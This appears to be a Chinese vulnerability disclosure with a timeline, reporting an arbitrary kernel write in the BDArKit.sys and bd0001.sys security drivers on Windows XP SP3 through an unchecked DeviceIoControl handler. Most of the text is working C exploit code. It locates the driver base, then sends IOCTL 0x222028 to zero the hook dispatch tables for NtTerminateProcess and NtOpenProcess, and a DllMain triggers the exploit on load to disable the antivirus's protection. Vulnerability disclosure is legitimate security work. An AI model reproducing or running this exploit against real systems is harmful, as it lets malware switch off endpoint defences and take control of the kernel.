2015-03-24: 细节已通知厂商并且等待厂商处理中 2015-03-29: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-05-23: 细节向核心白帽子及相关领域专家公开 2015-06-02: 细节向普通白帽子公开 2015-06-12: 细节向实习白帽子公开 2015-06-27: 细节向公众公开
BDArKit.sys对DeviceIoControl处理的参数检查不严格,可以造成任意地址写入漏洞1.版本
BDArKit.sys 2.0.13.34bd0001.sys 2.0.1.11系统:windows xp sp32.说明利用该漏洞,可以对任意内核地址写入0x00000000。比如将bd0001.sys内部记录的SSDT hook分发函数表置为空,从而解除全防御。也可以对其余内核模块进行修改实现用户态对内核态的完全控制。
漏洞触发之前:
漏洞触发之后:
DWORD GetDriverBase(CHAR* pName){ typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Reserved [2]; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName [256 ]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef LONG (WINAPI* FN_ZwQuerySystemInformation)(ULONG, PVOID, ULONG, PULONG); FN_ZwQuerySystemInformation fn = (FN_ZwQuerySystemInformation)GetProcAddress(GetModuleHandle(_T("ntdll")), "ZwQuerySystemInformation"); if(!fn) return 0; DWORD dwBase = 0; CHAR* pBuffer = new CHAR[0x10000]; memset(pBuffer, 0, 0x10000); ULONG cb = 0; LONG l = (*fn)(11, pBuffer, 0x10000, &cb); if(0 == l) { ULONG count = *((ULONG*)pBuffer); PSYSTEM_MODULE_INFORMATION pInfo = (PSYSTEM_MODULE_INFORMATION)(pBuffer + sizeof(ULONG)); for (ULONG i = 0; i < count; ++i) { if('\0' != pInfo[i].ImageName[0]) { strlwr(pInfo[i].ImageName); if(pName && strstr(pInfo[i].ImageName, pName)) { dwBase = (DWORD)pInfo[i].Base; break; } } } } delete pBuffer; return dwBase;}void CallDriver(HANDLE hDev){ DWORD bd0001Base = GetDriverBase("bd0001.sys"); if(!bd0001Base) return; DWORD code = 0x222028; char inputBuff[0x1000] = { 0 }; DWORD inputLen = 0xfc4; DWORD dwReturned = 0; DWORD a[] = {0x0000000a,0xfc4}; for(DWORD i = 0; i < sizeof(a)/sizeof(*a); ++i) { *((DWORD*)(inputBuff + 4*i)) = a[i]; } DeviceIoControl(hDev, code, (LPVOID)inputBuff, inputLen, (LPVOID)(bd0001Base + 0x14e80), // NtTerminateProcess的Hook函数分发表 0, &dwReturned, NULL); DeviceIoControl(hDev, code, (LPVOID)inputBuff, inputLen, (LPVOID)(bd0001Base + 0x132a8), // NtOpenProcess的Hook函数分发表 0, &dwReturned, NULL);}void FuzzDriver(){ LPCTSTR DevName = _T("\\\\.\\BDArKit"); HANDLE hDev = CreateFile(DevName, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if(INVALID_HANDLE_VALUE != hDev) { CallDriver(hDev); CloseHandle(hDev); }}BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ){ FuzzDriver(); return TRUE;}
加强IRP_MJ_DEVICE_CONTROL处理函数的逻辑检查,对参数做有效性校验。
危害等级:无影响厂商忽略
忽略时间:2015-06-27 15:37
暂无